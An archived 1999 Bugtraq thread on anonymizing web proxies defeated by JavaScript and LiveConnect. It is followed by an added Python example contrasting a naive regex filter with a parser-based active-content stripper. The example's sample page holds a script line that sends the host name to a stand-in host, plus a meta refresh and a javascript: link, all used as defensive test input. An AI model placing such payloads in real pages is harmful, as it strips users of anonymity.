Everhart, Glenn (FUSA)

From: Avi Rubin [rubin@RESEARCH.ATT.COM]
Sent: Tuesday, April 13, 1999 9:06 PM
To: BUGTRAQ@NETSPACE.ORG
Subject: Bugs in anonymity services

Just a quick response. I am one of the authors of the Crowds system. Your
attacks do not mention Crowds, although that system was described in the
Lewis article. In our original paper, which was published over a year ago,
we mentioned the possibility of Java or JavaScript attacks to compromise
anonymity. Our system also avoids redirect attacks by filtering out meta
refresh tags.

I don't think that Crowds is vulnerable to any of the attacks you mention,
as users are required (requested) to turn off all active content, such as
Java, JavaScript, etc., and to proxy all services through the crowd
(although not all are supported - they won't work, but they won't
compromise anonymity).

Unfortunately, we cannot ship our code outside of the US, but it is
available for free non-commercial use in the US. The page is
http://www.research.att.com/projects/crowds

Avi

> Hello,
>
> I found very serious security holes in all of the major anonymous Web
> surfing services (Anonymizer, Aixs, LPWA, etc.). These security holes
> allow a Web site to obtain information about users that the anonymizing
> services are supposed to be hiding. This message provides complete
> details of the problem and offers a simple work-around for users until
> the security holes are fixed.
>
> The April 8th issue of the New York Times has an article by Peter H.
> Lewis in the Circuits section that describes various types of services
> that allow people to anonymously surf the Web. The article is entitled
> "Internet Hide and Seek" and is available at the NY Times Web site:
>
> http://www.nytimes.com/library/tech/99/04/circuits/articles/08pete.html
>
> (Note, this article can only be viewed if you have a free NY Times Web
> account.)
>
> The three services described in the article are:
>
> Anonymizer (http://www.anonymizer.com)
> Bell Labs (http://www.bell-labs.com/project/lpwa)
> Naval Research Laboratory (http://www.onion-router.net)
>
> In addition, I found a pointer to a fourth service in a security
> newsgroup:
>
> Aixs (http://aixs.net/aixs/)
>
> The best known of these services is the Anonymizer at www.anonymizer.com.
> However, all four services basically work in the same manner. They are
> intended to hide information from a Web site when visited by a user. The
> services prevent the Web site from seeing the IP address, host computer
> name, and cookies of a user. All the services act as proxies, fetching
> pages from Web sites instead of users going directly to Web sites. The
> services make the promise that they don't pass private information along
> to Web sites. They also do no logging of Web sites that have been
> visited.
>
> After reading the article, I was curious to find out how well each of
> these services worked. In particular, I wanted to know if it would be
> possible for a Web site to defeat any of these systems. Unfortunately,
> with less than an hour's worth of work, I was able to get all four
> systems to fail when using Netscape 4.5.
>
> The most alarming failures occurred with the Anonymizer and Aixs systems.
> With the same small HTML page I was able to quietly turn off the
> anonymizing feature in both services. Once this page runs, it quickly
> redirects to a regular Web page of the Web site. Because the browser is
> no longer in anonymous mode, IP addresses and cookies are again sent
> from the user's browser to all Web servers. This security hole exists
> because both services fail to properly strip out embedded JavaScript
> code in all cases from HTML pages.
>
> With the Bell Labs and NRL systems I found a different failure. With a
> simple JavaScript expression I was able to query the IP address and host
> name of the browser computer. The query was done by calling the Java
> InetAddress class using the LiveConnect feature of Netscape Navigator.
> Once JavaScript has this information, it can easily be transmitted back
> to a Web server as part of a URL.
>
> A demo on the use of the Java InetAddress class to fetch the browser IP
> address and host name can be found at:
>
> http://www.tiac.net/users/smiths/js/livecon/index.htm
>
> If you are a user of any of these services, I highly recommend that you
> turn off JavaScript, Java, and ActiveX controls in your browser before
> surfing the Web. This simple precaution will prevent any leaks of your
> IP address or cookies. I will be notifying all 4 vendors about these
> security holes and hopefully this same recommendation will be given to
> all users.
>
> If you have any questions or comments, please send them via Email.
>
> Richard M. Smith
> smiths@tiac.net
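Both messages turn on proxy-side filtering of the fetched page: Crowds strips meta refresh tags, while the Anonymizer and Aixs "fail to properly strip out embedded JavaScript code in all cases". Pattern-matching filters of that kind are easy to slip past. The following is an added example, not code from Crowds, the Anonymizer, Aixs, or either author of the thread: a naive regex filter beside a tokeniser-based one, both run over a constructed sample page. The sample page, the example.invalid URLs, the leak() name and the java.net.InetAddress call (my reconstruction of the LiveConnect technique Smith describes, not his demo page) are assumptions, and the particular spellings that get past the naive filter are illustrative; they are not the cases Smith found, which he does not detail.

```python
"""Proxy-side filter that strips active content and meta refresh from an
HTML page, shown beside a naive regex filter that can be slipped past.
Added illustration; not code from Crowds, the Anonymizer or any service in
the thread.  The sample page is constructed; the java.net.InetAddress call
is a reconstruction of the LiveConnect technique, not Smith's demo page."""
import html
import re
from html.parser import HTMLParser

# Naive approach: case-sensitive regexes that match exactly one spelling.
_NAIVE_SCRIPT = re.compile(r"<script>.*?</script>", re.DOTALL)
_NAIVE_REFRESH = re.compile(r'<meta http-equiv="refresh"[^>]*>')


def naive_strip(page: str) -> str:
    """Remove <script>...</script> and meta refresh, one spelling each."""
    return _NAIVE_REFRESH.sub("", _NAIVE_SCRIPT.sub("", page))


class ActiveContentStripper(HTMLParser):
    """Tokenising filter: drops script/applet/object/embed elements with
    their contents, meta refresh, on* event-handler attributes and
    javascript: URLs, regardless of case, quoting or entity encoding."""

    ACTIVE_ELEMENTS = {"script", "applet", "object", "embed"}

    def __init__(self) -> None:
        super().__init__()      # convert_charrefs=True: text/attrs arrive decoded
        self.out: list[str] = []
        self.skip_depth = 0     # >0 while inside an active element

    @staticmethod
    def _is_refresh(tag, attrs) -> bool:
        return tag == "meta" and any(
            k == "http-equiv" and (v or "").strip().lower() == "refresh"
            for k, v in attrs)

    @staticmethod
    def _is_script_url(value) -> bool:
        # Drop whitespace/control characters browsers ignore before the scheme.
        cleaned = re.sub(r"[\x00-\x20]", "", value or "").lower()
        return cleaned.startswith("javascript:")

    def handle_starttag(self, tag, attrs):
        if tag in self.ACTIVE_ELEMENTS:
            self.skip_depth += 1
            return
        if self.skip_depth or self._is_refresh(tag, attrs):
            return
        kept = []
        for name, value in attrs:       # HTMLParser lower-cases tag/attr names
            if name.startswith("on") or self._is_script_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"'
                        if value is not None else f" {name}")
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # self-closing: no end tag follows
        if tag in self.ACTIVE_ELEMENTS:
            self.skip_depth -= 1

    def handle_endtag(self, tag):
        if tag in self.ACTIVE_ELEMENTS:
            self.skip_depth = max(self.skip_depth - 1, 0)
        elif not self.skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")

    def handle_comment(self, data):
        pass    # comments are dropped: script was commonly hidden inside them


def strip_active_content(page: str) -> str:
    parser = ActiveContentStripper()
    parser.feed(page)
    parser.close()
    return "".join(parser.out)


# Constructed sample page using spellings the naive filter does not match.
SAMPLE_PAGE = """<!DOCTYPE html><html><body onLoad="leak()">
<SCRIPT>location='http://example.invalid/?h='+java.net.InetAddress.getLocalHost().getHostName()</SCRIPT>
<META HTTP-EQUIV=Refresh CONTENT="0; URL=http://example.invalid/plain.html">
<a href=" JavaScript:leak()">click</a>
<a href="http://example.invalid/ok.html">fine</a>
</body></html>"""

LEAK_MARKERS = ("java.net", "refresh", "onload", "javascript:")


def remaining_leaks(page: str) -> list:
    """Which constructed markers survive in a filter's output (case-insensitive)."""
    low = page.lower()
    return [m for m in LEAK_MARKERS if m in low]


if __name__ == "__main__":
    print("naive  :", remaining_leaks(naive_strip(SAMPLE_PAGE)))
    print("parser :", remaining_leaks(strip_active_content(SAMPLE_PAGE)))
    print(strip_active_content(SAMPLE_PAGE))
```

Even the parser-based version only protects the user if the proxy rewrites every response the browser will render, which is why both messages end with the same advice: turn off Java, JavaScript and ActiveX in the browser rather than relying on the proxy's filtering alone.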